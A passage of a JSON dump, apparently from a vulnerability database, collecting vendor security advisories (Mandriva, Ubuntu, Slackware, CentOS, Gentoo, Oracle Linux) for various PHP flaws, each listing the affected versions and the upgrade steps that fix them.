"SECURITYVULNS:DOC:7349", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:7349", "title": "Advisory 01/2004: Multiple vulnerabilities in PHP 4/5", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:57", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2015:032\r\n http://www.mandriva.com/en/support/security/\r\n _______________________________________________________________________\r\n\r\n Package : php\r\n Date : February 5, 2015\r\n Affected: Business Server 1.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Multiple vulnerabilities has been discovered and corrected in php:\r\n \r\n sapi/cgi/cgi_main.c in the CGI component in PHP through 5.4.36, 5.5.x\r\n through 5.5.20, and 5.6.x through 5.6.4, when mmap is used to read\r\n a .php file, does not properly consider the mapping&#039;s length during\r\n processing of an invalid file that begins with a # character and lacks\r\n a newline character, which causes an out-of-bounds read and might &#40;1&#41;\r\n allow remote attackers to obtain sensitive information from php-cgi\r\n process memory by leveraging the ability to upload a .php file or &#40;2&#41;\r\n trigger unexpected code execution if a valid PHP script is present\r\n in memory locations adjacent to the mapping &#40;CVE-2014-9427&#41;.\r\n \r\n Use-after-free vulnerability in the process_nested_data function in\r\n ext/standard/var_unserializer.re in PHP before 5.4.37, 5.5.x before\r\n 5.5.21, and 5.6.x before 5.6.5 allows remote attackers to execute\r\n arbitrary code via a crafted unserialize call that leverages improper\r\n handling of duplicate numerical keys within the serialized properties\r\n of an object. NOTE: this vulnerability exists because of an incomplete\r\n fix for CVE-2014-8142 &#40;CVE-2015-0231&#41;.\r\n \r\n The exif_process_unicode function in ext/exif/exif.c in PHP before\r\n 5.4.37, 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allows remote\r\n attackers to execute arbitrary code or cause a denial of service\r\n &#40;uninitialized pointer free and application crash&#41; via crafted EXIF\r\n data in a JPEG image &#40;CVE-2015-0232&#41;.\r\n \r\n The updated php packages have been upgraded to the 5.5.21 version\r\n which is not vulnerable to these issues.\r\n \r\n Additionally, the timezonedb package has been upgraded to the latest\r\n 2015.1 version, the php-suhosin package has been upgraded to the\r\n latest 0.9.37.1 and the PECL packages which requires so has been\r\n rebuilt for php-5.5.21.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9427\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0231\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0232\r\n http://php.net/ChangeLog-5.php#5.5.21\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Business Server 1/X86_64:\r\n e10b93bf56ffd9de6bc3dc7097186d0d mbs1/x86_64/apache-mod_php-5.5.21-1.mbs1.x86_64.rpm\r\n 35cf46d3f0b04ec4e4ce251658817967 mbs1/x86_64/lib64php5_common5-5.5.21-1.mbs1.x86_64.rpm\r\n 380fbb305decb415730164df5966c5db mbs1/x86_64/php-apc-3.1.15-1.15.mbs1.x86_64.rpm\r\n cf2f06ade39ba0e5bc8c672dbfc6ff77 mbs1/x86_64/php-apc-admin-3.1.15-1.15.mbs1.x86_64.rpm\r\n 15d498fd2fa763f5b1b2a09432b3834f mbs1/x86_64/php-bcmath-5.5.21-1.mbs1.x86_64.rpm\r\n 80c239999520eb885150c193856969be mbs1/x86_64/php-bz2-5.5.21-1.mbs1.x86_64.rpm\r\n 3305d51bd901f85d93b4ffb85d9fb55a mbs1/x86_64/php-calendar-5.5.21-1.mbs1.x86_64.rpm\r\n 37430aab4267b1577333a52591ef483c mbs1/x86_64/php-cgi-5.5.21-1.mbs1.x86_64.rpm\r\n 7610a03c06613e9a342983b0cfc3e04b mbs1/x86_64/php-cli-5.5.21-1.mbs1.x86_64.rpm\r\n 5962886825c659cf7aa66bbf0e7bcdc7 mbs1/x86_64/php-ctype-5.5.21-1.mbs1.x86_64.rpm\r\n a2870a53aeec993e0d73aff6b147002d mbs1/x86_64/php-curl-5.5.21-1.mbs1.x86_64.rpm\r\n d8212e3ff340631b76c1f2ee570f39a2 mbs1/x86_64/php-dba-5.5.21-1.mbs1.x86_64.rpm\r\n aa760f1a74519f33d412234c6b46b5a2 mbs1/x86_64/php-devel-5.5.21-1.mbs1.x86_64.rpm\r\n b0e1edd28c8946b8f70f904ad74f6196 mbs1/x86_64/php-doc-5.5.21-1.mbs1.noarch.rpm\r\n 1ab05b3b4f388fe169a1665f845708b3 mbs1/x86_64/php-dom-5.5.21-1.mbs1.x86_64.rpm\r\n 8df5513d5170a461c8c2c94cab77d673 mbs1/x86_64/php-enchant-5.5.21-1.mbs1.x86_64.rpm\r\n 5a21e187f513214c1203de6ca92bb0d5 mbs1/x86_64/php-exif-5.5.21-1.mbs1.x86_64.rpm\r\n 74c5e7af8d5ef99fba456636d11dbc5b mbs1/x86_64/php-fileinfo-5.5.21-1.mbs1.x86_64.rpm\r\n eac42ef4b3b6dfdf5ffa2e0aefc214de mbs1/x86_64/php-filter-5.5.21-1.mbs1.x86_64.rpm\r\n deb876cfeda3f9a8eb8682f8a1acbd44 mbs1/x86_64/php-fpm-5.5.21-1.mbs1.x86_64.rpm\r\n 22a24f2ace7196206f5d412bb0d0c283 mbs1/x86_64/php-ftp-5.5.21-1.mbs1.x86_64.rpm\r\n b9281f2d656ceb0362a085213798abec mbs1/x86_64/php-gd-5.5.21-1.mbs1.x86_64.rpm\r\n 4e55d36d0e9cdcbfe9f6f2b4a6694661 mbs1/x86_64/php-gettext-5.5.21-1.mbs1.x86_64.rpm\r\n 39ca752f1ffb768cfe1117b6884359ba mbs1/x86_64/php-gmp-5.5.21-1.mbs1.x86_64.rpm\r\n 70d257981f63d37cd4416776f09b93e0 mbs1/x86_64/php-hash-5.5.21-1.mbs1.x86_64.rpm\r\n f138cbe8fefddc2fcf1bb6b4ef0e51c8 mbs1/x86_64/php-iconv-5.5.21-1.mbs1.x86_64.rpm\r\n a6f413cf6ac533ac2c863ca3edad35a0 mbs1/x86_64/php-imap-5.5.21-1.mbs1.x86_64.rpm\r\n e21379d08e795a07950612e759f31329 mbs1/x86_64/php-ini-5.5.21-1.mbs1.x86_64.rpm\r\n 016b63d1bdac5c053f6c750f58a9587e mbs1/x86_64/php-intl-5.5.21-1.mbs1.x86_64.rpm\r\n 2aaba314e9d37fe4208d9cd41a889fef mbs1/x86_64/php-json-5.5.21-1.mbs1.x86_64.rpm\r\n 2400f52a1b4bc7c492905baa55276ab2 mbs1/x86_64/php-ldap-5.5.21-1.mbs1.x86_64.rpm\r\n f0d39fc248825c8b6d575be7ac77304d mbs1/x86_64/php-mbstring-5.5.21-1.mbs1.x86_64.rpm\r\n a2e705d08022416e60ee865183485eda mbs1/x86_64/php-mcrypt-5.5.21-1.mbs1.x86_64.rpm\r\n fd7b9e0d7c928547670bde3d41836a58 mbs1/x86_64/php-mssql-5.5.21-1.mbs1.x86_64.rpm\r\n c7c115d4b0b044b4a156719a952a3aa0 mbs1/x86_64/php-mysql-5.5.21-1.mbs1.x86_64.rpm\r\n 72229e16ce7f25cebbfd32c9bf1279dc mbs1/x86_64/php-mysqli-5.5.21-1.mbs1.x86_64.rpm\r\n 6214401d42c419b786c53b07450d3102 mbs1/x86_64/php-mysqlnd-5.5.21-1.mbs1.x86_64.rpm\r\n 051905065c0a836ad22a156ae8be38aa mbs1/x86_64/php-odbc-5.5.21-1.mbs1.x86_64.rpm\r\n d0f60e037a0b2915938544ebf4a3b009 mbs1/x86_64/php-opcache-5.5.21-1.mbs1.x86_64.rpm\r\n 51fa835f0b3fd0c2b6cbaf072049ad7c mbs1/x86_64/php-openssl-5.5.21-1.mbs1.x86_64.rpm\r\n 0444aab16fb7ec45249cde7c02259972 mbs1/x86_64/php-pcntl-5.5.21-1.mbs1.x86_64.rpm\r\n 0073dd43664b44b837c6d7604d097d31 mbs1/x86_64/php-pdo-5.5.21-1.mbs1.x86_64.rpm\r\n ad00b9b7d118e7dd72234d4ae3937f8c mbs1/x86_64/php-pdo_dblib-5.5.21-1.mbs1.x86_64.rpm\r\n c20479f9036d7b7a2c7b922547d98577 mbs1/x86_64/php-pdo_mysql-5.5.21-1.mbs1.x86_64.rpm\r\n 14e356c11403107b7f07acf1ff3d8e91 mbs1/x86_64/php-pdo_odbc-5.5.21-1.mbs1.x86_64.rpm\r\n f43f6ffab9717cfbe63b6d44feadce69 mbs1/x86_64/php-pdo_pgsql-5.5.21-1.mbs1.x86_64.rpm\r\n 83b4abb4f03504eaa9650dcb8afafcda mbs1/x86_64/php-pdo_sqlite-5.5.21-1.mbs1.x86_64.rpm\r\n 1a5965f09e247f2b61c62da716db2bc3 mbs1/x86_64/php-pgsql-5.5.21-1.mbs1.x86_64.rpm\r\n 7bb8c80d39970eff0e91d70a628c1f6f mbs1/x86_64/php-phar-5.5.21-1.mbs1.x86_64.rpm\r\n d7d1e4862e41d327668dcdbab17b16af mbs1/x86_64/php-posix-5.5.21-1.mbs1.x86_64.rpm\r\n a8ffaebca7ac3d5cd68ea683fd96d355 mbs1/x86_64/php-readline-5.5.21-1.mbs1.x86_64.rpm\r\n 47bfab007757c043a20869d9cfb3dfce mbs1/x86_64/php-recode-5.5.21-1.mbs1.x86_64.rpm\r\n ef7b539f7b1bd362b0ab5132c1ed02e9 mbs1/x86_64/php-session-5.5.21-1.mbs1.x86_64.rpm\r\n c221a953b4d19aa1abbb1554e1dcba7f mbs1/x86_64/php-shmop-5.5.21-1.mbs1.x86_64.rpm\r\n faa7f998119c8caeaf41633eebeda8cf mbs1/x86_64/php-snmp-5.5.21-1.mbs1.x86_64.rpm\r\n 76c9cce8476b0cc570feb5f559d41100 mbs1/x86_64/php-soap-5.5.21-1.mbs1.x86_64.rpm\r\n 8ba094b373532be959ec091e170ec67f mbs1/x86_64/php-sockets-5.5.21-1.mbs1.x86_64.rpm\r\n 4ba897393ae80f5258904da4e674763e mbs1/x86_64/php-sqlite3-5.5.21-1.mbs1.x86_64.rpm\r\n 805a305e9bbe7aa4205bf2b161cfbed5 mbs1/x86_64/php-suhosin-0.9.37.1-1.1.mbs1.x86_64.rpm\r\n f9ce38cee5e9dae0093be89dace73264 mbs1/x86_64/php-sybase_ct-5.5.21-1.mbs1.x86_64.rpm\r\n 69cf5f72855d32e5f482c61294e623ed mbs1/x86_64/php-sysvmsg-5.5.21-1.mbs1.x86_64.rpm\r\n 09b48a0e2d140c5a15b23cb2b5068ac0 mbs1/x86_64/php-sysvsem-5.5.21-1.mbs1.x86_64.rpm\r\n a6aa97b047afe2bf4069b72b4a5ddd78 mbs1/x86_64/php-sysvshm-5.5.21-1.mbs1.x86_64.rpm\r\n 356b7bf2e5f41cce66698a359d8062ac mbs1/x86_64/php-tidy-5.5.21-1.mbs1.x86_64.rpm\r\n 5e7ad121c41731660209e6a3d003b142 mbs1/x86_64/php-timezonedb-2015.1-1.mbs1.x86_64.rpm\r\n dffe6910d0f170be5bf49fe4cd959883 mbs1/x86_64/php-tokenizer-5.5.21-1.mbs1.x86_64.rpm\r\n e2ad6ddab9e9ed43d3ad4979c6c4f86b mbs1/x86_64/php-wddx-5.5.21-1.mbs1.x86_64.rpm\r\n 26e46036e5a4d4cefb4fbde1c06100d7 mbs1/x86_64/php-xml-5.5.21-1.mbs1.x86_64.rpm\r\n 8664c4fbce6fa50245edc216e6c8e959 mbs1/x86_64/php-xmlreader-5.5.21-1.mbs1.x86_64.rpm\r\n dba1da2ada8d7073f1d9e8bbf11b1ea7 mbs1/x86_64/php-xmlrpc-5.5.21-1.mbs1.x86_64.rpm\r\n 2d68665ed632fa69e97cb9f8d2c7dc0b mbs1/x86_64/php-xmlwriter-5.5.21-1.mbs1.x86_64.rpm\r\n 94f4c00b2c83050b2c4c4713976940ee mbs1/x86_64/php-xsl-5.5.21-1.mbs1.x86_64.rpm\r\n 3afda2f608982df1faa4b6db3c1c9a55 mbs1/x86_64/php-zip-5.5.21-1.mbs1.x86_64.rpm\r\n 88c51809d22c4e364ed70e1567eccac8 mbs1/x86_64/php-zlib-5.5.21-1.mbs1.x86_64.rpm \r\n 275b50c9dfa2cc7b5244a7bece61644a mbs1/SRPMS/php-5.5.21-1.mbs1.src.rpm\r\n ef1cf8b05352ebf671b704ecc8e54c4b mbs1/SRPMS/php-apc-3.1.15-1.15.mbs1.src.rpm\r\n 84245bb31cf43e549fde22690802b44d mbs1/SRPMS/php-suhosin-0.9.37.1-1.1.mbs1.src.rpm\r\n 61203a18b4f0ac67117f5b0fcbf348a7 mbs1/SRPMS/php-timezonedb-2015.1-1.mbs1.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/en/support/security/advisories/\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_&#40;at&#41;_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n &lt;security*mandriva.com&gt;\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 &#40;GNU/Linux&#41;\r\n\r\niD8DBQFU05RlmqjQ0CJFipgRArmOAKDKYyVQrC1CpH9JKrd8HAhddB7oZQCgtdL8\r\n0rueIDnGzKxeJYZDOf8Kdvo=\r\n=3Yt1\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2015-02-11T00:00:00", "published": "2015-02-11T00:00:00", "id": "SECURITYVULNS:DOC:31712", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31712", "title": "[ MDVSA-2015:032 ] php", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:57", "bulletinFamily": "software", "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2501-1\r\nFebruary 17, 2015\r\n\r\nphp5 vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 14.10\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nSeveral security issues were fixed in PHP.\r\n\r\nSoftware Description:\r\n- php5: HTML-embedded scripting language interpreter\r\n\r\nDetails:\r\n\r\nStefan Esser discovered that PHP incorrectly handled unserializing objects.\r\nA remote attacker could use this issue to cause PHP to crash, resulting in\r\na denial of service, or possibly execute arbitrary code. &#40;CVE-2014-8142,\r\nCVE-2015-0231&#41;\r\n\r\nBrian Carpenter discovered that the PHP CGI component incorrectly handled\r\ninvalid files. A local attacker could use this issue to obtain sensitive\r\ninformation, or possibly execute arbitrary code. This issue only affected\r\nUbuntu 14.04 LTS and Ubuntu 14.10. &#40;CVE-2014-9427&#41;\r\n\r\nIt was discovered that PHP incorrectly handled certain pascal strings in\r\nthe fileinfo extension. A remote attacker could possibly use this issue to\r\ncause PHP to crash, resulting in a denial of service. This issue only\r\naffected Ubuntu 14.04 LTS and Ubuntu 14.10. &#40;CVE-2014-9652&#41;\r\n\r\nAlex Eubanks discovered that PHP incorrectly handled EXIF data in JPEG\r\nimages. A remote attacker could use this issue to cause PHP to crash,\r\nresulting in a denial of service, or possibly execute arbitrary code.\r\nThis issue only affected Ubuntu 14.04 LTS and Ubuntu 14.10. &#40;CVE-2015-0232&#41;\r\n\r\nIt was discovered that the PHP opcache component incorrectly handled\r\nmemory. A remote attacker could possibly use this issue to cause PHP to\r\ncrash, resulting in a denial of service, or possibly execute arbitrary\r\ncode. This issue only affected Ubuntu 14.04 LTS and Ubuntu 14.10.\r\n&#40;CVE-2015-1351&#41;\r\n\r\nIt was discovered that the PHP PostgreSQL database extension incorrectly\r\nhandled certain pointers. A remote attacker could possibly use this issue\r\nto cause PHP to crash, resulting in a denial of service, or possibly\r\nexecute arbitrary code. This issue only affected Ubuntu 14.04 LTS and\r\nUbuntu 14.10. &#40;CVE-2015-1352&#41;\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 14.10:\r\n libapache2-mod-php5 5.5.12+dfsg-2ubuntu4.2\r\n php5-cgi 5.5.12+dfsg-2ubuntu4.2\r\n php5-cli 5.5.12+dfsg-2ubuntu4.2\r\n php5-fpm 5.5.12+dfsg-2ubuntu4.2\r\n php5-pgsql 5.5.12+dfsg-2ubuntu4.2\r\n\r\nUbuntu 14.04 LTS:\r\n libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.6\r\n php5-cgi 5.5.9+dfsg-1ubuntu4.6\r\n php5-cli 5.5.9+dfsg-1ubuntu4.6\r\n php5-fpm 5.5.9+dfsg-1ubuntu4.6\r\n php5-pgsql 5.5.9+dfsg-1ubuntu4.6\r\n\r\nUbuntu 12.04 LTS:\r\n libapache2-mod-php5 5.3.10-1ubuntu3.16\r\n php5-cgi 5.3.10-1ubuntu3.16\r\n php5-cli 5.3.10-1ubuntu3.16\r\n php5-fpm 5.3.10-1ubuntu3.16\r\n php5-pgsql 5.3.10-1ubuntu3.16\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2501-1\r\n CVE-2014-8142, CVE-2014-9427, CVE-2014-9652, CVE-2015-0231,\r\n CVE-2015-0232, CVE-2015-1351, CVE-2015-1352\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/php5/5.5.12+dfsg-2ubuntu4.2\r\n https://launchpad.net/ubuntu/+source/php5/5.5.9+dfsg-1ubuntu4.6\r\n https://launchpad.net/ubuntu/+source/php5/5.3.10-1ubuntu3.16\r\n\r\n\r\n\r\n\r\n-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "modified": "2015-02-22T00:00:00", "published": "2015-02-22T00:00:00", "id": "SECURITYVULNS:DOC:31728", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31728", "title": "[USN-2501-1] PHP vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "slackware": [{"lastseen": "2018-08-31T00:37:03", "bulletinFamily": "unix", "description": "New php packages are available for Slackware 14.0, 14.1, and -current to\nfix security issues.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/php-5.4.36-i486-1_slack14.1.txz: Upgraded.\n This update fixes bugs and security issues.\n #68545 (NULL pointer dereference in unserialize.c).\n #68594 (Use after free vulnerability in unserialize()). (CVE-2014-8142)\n #68283 (fileinfo: out-of-bounds read in elf note headers). (CVE-2014-3710)\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3710\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8142\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the &quot;Get Slack&quot; section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/php-5.4.36-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/php-5.4.36-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/php-5.4.36-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/php-5.4.36-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.4.36-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-5.4.36-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.0 package:\nd25a3e243ec1921b7ac321be40336251 php-5.4.36-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\nc374f5fef8a922ee1718232be4baefbf php-5.4.36-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n365000d20e974b045b2acc143ba6dfbe php-5.4.36-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n81fc269537befcc2fcb3be913588d8cc php-5.4.36-x86_64-1_slack14.1.txz\n\nSlackware -current package:\nbce0dc50b1430ed7a521b07795763922 n/php-5.4.36-i486-1.txz\n\nSlackware x86_64 -current package:\n6266e021adac91c16e68e61ee4bcdf9b n/php-5.4.36-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg php-5.4.36-i486-1_slack14.1.txz\n\nThen, restart Apache httpd:\n > /etc/rc.d/rc.httpd stop\n > /etc/rc.d/rc.httpd start", "modified": "2014-12-22T21:38:55", "published": "2014-12-22T21:38:55", "id": "SSA-2014-356-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.400170", "title": "php", "type": "slackware", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "centos": [{"lastseen": "2018-01-25T07:01:57", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2005:838-01\n\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server.\r\n\r\nA flaw was found in the way PHP registers global variables during a file\r\nupload request. A remote attacker could submit a carefully crafted\r\nmultipart/form-data POST request that would overwrite the $GLOBALS array,\r\naltering expected script behavior, and possibly leading to the execution of\r\narbitrary PHP commands. Note that this vulnerability only affects\r\ninstallations which have register_globals enabled in the PHP configuration\r\nfile, which is not a default or recommended option. The Common\r\nVulnerabilities and Exposures project assigned the name CVE-2005-3390 to\r\nthis issue.\r\n\r\nA flaw was found in the PHP parse_str() function. If a PHP script passes\r\nonly one argument to the parse_str() function, and the script can be forced\r\nto abort execution during operation (for example due to the memory_limit\r\nsetting), the register_globals may be enabled even if it is disabled in the\r\nPHP configuration file. This vulnerability only affects installations that\r\nhave PHP scripts using the parse_str function in this way. (CVE-2005-3389)\r\n\r\nA Cross-Site Scripting flaw was found in the phpinfo() function. If a\r\nvictim can be tricked into following a malicious URL to a site with a page\r\ndisplaying the phpinfo() output, it may be possible to inject javascript\r\nor HTML content into the displayed page or steal data such as cookies. \r\nThis vulnerability only affects installations which allow users to view the\r\noutput of the phpinfo() function. As the phpinfo() function outputs a\r\nlarge amount of information about the current state of PHP, it should only\r\nbe used during debugging or if protected by authentication. (CVE-2005-3388)\r\n\r\nAdditionally, a bug introduced in the updates to fix CVE-2004-1019 has been\r\ncorrected.\r\n\r\nUsers of PHP should upgrade to these updated packages, which contain\r\nbackported patches that resolve these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2005-November/012392.html\n\n**Affected packages:**\nphp\nphp-devel\nphp-imap\nphp-ldap\nphp-manual\nphp-mysql\nphp-odbc\nphp-pgsql\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/rh21as-errata.html", "modified": "2005-11-10T23:45:48", "published": "2005-11-10T23:45:48", "href": "http://lists.centos.org/pipermail/centos-announce/2005-November/012392.html", "id": "CESA-2005:838-01", "title": "php security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:04", "bulletinFamily": "unix", "description": "### Background\n\nPHP is a general-purpose scripting language widely used to develop web-based applications. It can run inside a web server using the mod_php module or the CGI version of PHP, or can run stand-alone in a CLI. \n\n### Description\n\nStefan Esser and Marcus Boerger reported several different issues in the unserialize() function, including serious exploitable bugs in the way it handles negative references (CAN-2004-1019). \n\nStefan Esser also discovered that the pack() and unpack() functions are subject to integer overflows that can lead to a heap buffer overflow and a heap information leak. Finally, he found that the way multithreaded PHP handles safe_mode_exec_dir restrictions can be bypassed, and that various path truncation issues also allow to bypass path and safe_mode restrictions. \n\nIlia Alshanetsky found a stack overflow issue in the exif_read_data() function (CAN-2004-1065). Finally, Daniel Fabian found that addslashes and magic_quotes_gpc do not properly escape null characters and that magic_quotes_gpc contains a bug that could lead to one level directory traversal. \n\n### Impact\n\nThese issues could be exploited by a remote attacker to retrieve web server heap information, bypass safe_mode or path restrictions and potentially execute arbitrary code with the rights of the web server running a PHP application. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll PHP users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-php/php-4.3.10\"\n\nAll mod_php users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-php/mod_php-4.3.10\"\n\nAll php-cgi users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-php/php-cgi-4.3.10\"", "modified": "2006-05-22T00:00:00", "published": "2004-12-19T00:00:00", "id": "GLSA-200412-14", "href": "https://security.gentoo.org/glsa/200412-14", "type": "gentoo", "title": "PHP: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-06T19:46:46", "bulletinFamily": "unix", "description": "### Background\n\nPHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. \n\n### Description\n\nMultiple vulnerabilities have been discovered in PHP. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker can leverage these vulnerabilities to execute arbitrary code or cause Denial of Service. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll PHP 5.5 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-lang/php-5.5.21\"\n \n\nAll PHP 5.4 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-lang/php-5.4.37\"\n \n\nAll PHP 5.3 users should upgrade to the latest version. This branch is currently past the end of life and it will no longer receive security fixes. All PHP 5.3 users are strongly recommended to upgrade to the current stable version of PHP 5.5 or previous stable version of PHP 5.4, which are supported till at least 2016 and 2015 respectively.", "modified": "2015-08-22T00:00:00", "published": "2015-03-08T00:00:00", "id": "GLSA-201503-03", "href": "https://security.gentoo.org/glsa/201503-03", "type": "gentoo", "title": "PHP: Multiple vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:42:05", "bulletinFamily": "unix", "description": "php55\n[2.0-1]\n- fix incorrect selinux contexts #1194336\nphp55-php\n[5.5.21-2.0.1]\n- add dtrace-utils as build dependency\n[5.5.21-2]\n- core: fix use-after-free vulnerability in the\n process_nested_data function (unserialize) CVE-2015-2787\n- core: fix NUL byte injection in file name argument of\n move_uploaded_file() CVE-2015-2348\n- date: fix use after free vulnerability in unserialize()\n with DateTimeZone CVE-2015-0273\n- enchant: fix heap buffer overflow in\n enchant_broker_request_dict() CVE-2014-9705\n- ereg: fix heap overflow in regcomp() CVE-2015-2305\n- opcache: fix use after free CVE-2015-1351\n- phar: fix use after free in phar_object.c CVE-2015-2301\n- pgsql: fix NULL pointer dereference CVE-2015-1352\n- soap: fix type confusion through unserialize #1204868\n[5.5.21-1]\n- rebase to PHP 5.5.21\n[5.5.20-1]\n- rebase to PHP 5.5.20 #1057089\n- fix package name in description\n- php-fpm own session and wsdlcache dir\n- php-common doesn't provide php-gmp", "modified": "2016-02-04T00:00:00", "published": "2016-02-04T00:00:00", "id": "ELSA-2015-1053", "href": "http://linux.oracle.com/errata/ELSA-2015-1053.html", "title": "php55 security and bug fix update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:44:09", "bulletinFamily": "unix", "description": "php54\n[2.0-1]\n- fix incorrect selinux contexts #1194332\nphp54-php\n[5.4.40-1]\n- rebase to PHP 5.4.40 for various security fix #1209887\n[5.4.37-1]\n- rebase to PHP 5.4.37\n[5.4.36-1]\n- rebase to PHP 5.4.36 #1168193\n- fix package name in description\n- php-fpm own session dir\nphp54-php-pecl-zendopcache\n[7.0.4-3]\n- fix use after free CVE-2015-1351\n[7.0.4-2]\n- add upstream patch for failed test\n[7.0.4-1]\n- Update to 7.0.4\n[7.0.3-1]\n- update to 7.0.3 #1055927", "modified": "2016-02-04T00:00:00", "published": "2016-02-04T00:00:00", "id": "ELSA-2015-1066", "href": "http://linux.oracle.com/errata/ELSA-2015-1066.html", "title": "php54 security and bug fix update", "type": "oraclelinux", 